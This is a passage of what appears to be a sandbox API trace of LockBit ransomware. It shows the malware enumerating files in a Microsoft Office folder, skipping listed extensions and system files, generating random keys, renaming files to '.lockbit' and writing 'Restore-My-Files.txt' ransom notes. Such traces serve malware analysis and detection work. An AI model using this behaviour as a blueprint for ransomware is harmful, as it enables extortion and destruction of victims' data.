wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.242] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.242] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cc3e500, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcda2ae0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x2cc3e500, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21327_.GIF", cAlternateFileName="")) returned 1 [0204.242] lstrcmpiW (lpString1=".", lpString2="BD21327_.GIF") returned -1 [0204.242] lstrcmpiW (lpString1="..", lpString2="BD21327_.GIF") returned -1 [0204.242] PathFindExtensionW (pszPath="BD21327_.GIF") returned=".GIF" [0204.242] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.242] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.242] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.242] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.242] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.242] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.243] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.243] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.243] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.243] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.243] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.243] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.243] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.243] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.243] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.243] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.243] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.243] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.243] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.243] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.243] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.243] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.243] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.243] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.243] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.243] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.243] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.243] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.243] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.243] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.243] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.243] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.243] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.244] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.244] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.244] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.244] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.244] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.244] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.244] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.244] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.244] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.244] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.244] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.244] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.244] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.244] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.244] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21327_.GIF") returned 1 [0204.244] lstrcmpiW (lpString1="ntldr", lpString2="BD21327_.GIF") returned 1 [0204.244] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21327_.GIF") returned 1 [0204.244] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21327_.GIF") returned 1 [0204.244] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21327_.GIF") returned -1 [0204.244] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21327_.GIF") returned 1 [0204.244] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21327_.GIF") returned 1 [0204.244] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.244] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21327_.GIF") returned=".GIF" [0204.244] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.244] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.244] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.245] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.245] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.245] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.245] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.245] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.245] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.245] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.245] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.245] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.245] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.245] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.245] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.245] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.245] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.245] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.245] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.245] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.245] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.245] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.245] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.245] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.245] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.245] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.245] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.245] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.245] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21327_.GIF.lockbit") returned 78 [0204.246] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21327_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21327_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.248] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.248] malloc (_Size=0x40068) returned 0x3df0008 [0204.248] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=174) returned 1 [0204.248] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.249] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.249] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.249] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.249] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.249] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.249] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.253] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21327_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21327_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.254] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.254] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.254] free (_Block=0x1fa2ed8) [0204.254] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21327_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.254] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.254] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.254] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29305e00, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcdc8c40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x29305e00, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x131, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21329_.GIF", cAlternateFileName="")) returned 1 [0204.254] lstrcmpiW (lpString1=".", lpString2="BD21329_.GIF") returned -1 [0204.254] lstrcmpiW (lpString1="..", lpString2="BD21329_.GIF") returned -1 [0204.254] PathFindExtensionW (pszPath="BD21329_.GIF") returned=".GIF" [0204.254] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.254] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.254] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.254] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.254] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.254] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.254] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.254] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.254] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.254] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.254] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.254] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.254] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.255] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.255] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.255] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.255] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.255] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.255] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.255] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.255] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.255] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.255] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.255] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.255] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.255] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.255] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.255] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.255] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.255] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.255] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.255] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.255] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.255] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.255] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.255] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.255] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.255] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.255] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.255] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.256] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.256] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.256] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.256] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.256] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.256] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.256] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.256] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21329_.GIF") returned 1 [0204.256] lstrcmpiW (lpString1="ntldr", lpString2="BD21329_.GIF") returned 1 [0204.256] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21329_.GIF") returned 1 [0204.256] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21329_.GIF") returned 1 [0204.256] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21329_.GIF") returned -1 [0204.256] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21329_.GIF") returned 1 [0204.256] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21329_.GIF") returned 1 [0204.256] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.256] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21329_.GIF") returned=".GIF" [0204.256] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.256] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.256] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.256] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.256] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.256] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.256] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.256] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.256] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.256] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.256] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.256] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.256] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.257] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.257] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.257] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.257] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.257] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.257] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.257] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.257] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.257] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.257] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.257] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.257] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.257] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.257] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.257] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.257] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21329_.GIF.lockbit") returned 78 [0204.257] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21329_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21329_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.259] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.259] malloc (_Size=0x40068) returned 0x3df0008 [0204.259] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=305) returned 1 [0204.259] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.259] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.259] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.259] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.260] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.260] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.260] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.264] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21329_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21329_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.264] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.264] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.264] free (_Block=0x1fa2ed8) [0204.264] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21329_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.264] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.264] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.264] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x259cd700, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcdc8c40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x259cd700, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21331_.GIF", cAlternateFileName="")) returned 1 [0204.264] lstrcmpiW (lpString1=".", lpString2="BD21331_.GIF") returned -1 [0204.264] lstrcmpiW (lpString1="..", lpString2="BD21331_.GIF") returned -1 [0204.264] PathFindExtensionW (pszPath="BD21331_.GIF") returned=".GIF" [0204.264] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.264] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.264] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.264] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.264] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.264] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.264] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.264] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.264] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.264] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.264] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.264] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.264] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.264] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.264] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.264] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.264] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.264] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.265] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.266] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.266] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.266] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.266] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.266] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.266] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.266] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.266] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.266] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.267] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.267] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.267] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.267] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.267] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.267] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.267] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.267] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.267] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.267] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.267] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.267] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.267] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.267] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.267] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.267] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.267] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.267] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.267] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.267] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21331_.GIF") returned 1 [0204.267] lstrcmpiW (lpString1="ntldr", lpString2="BD21331_.GIF") returned 1 [0204.267] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21331_.GIF") returned 1 [0204.267] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21331_.GIF") returned 1 [0204.267] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21331_.GIF") returned -1 [0204.267] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21331_.GIF") returned 1 [0204.267] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21331_.GIF") returned 1 [0204.267] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.267] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21331_.GIF") returned=".GIF" [0204.267] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.267] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.267] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.267] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.267] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.268] lstrcmpiW (lpString1=".db", 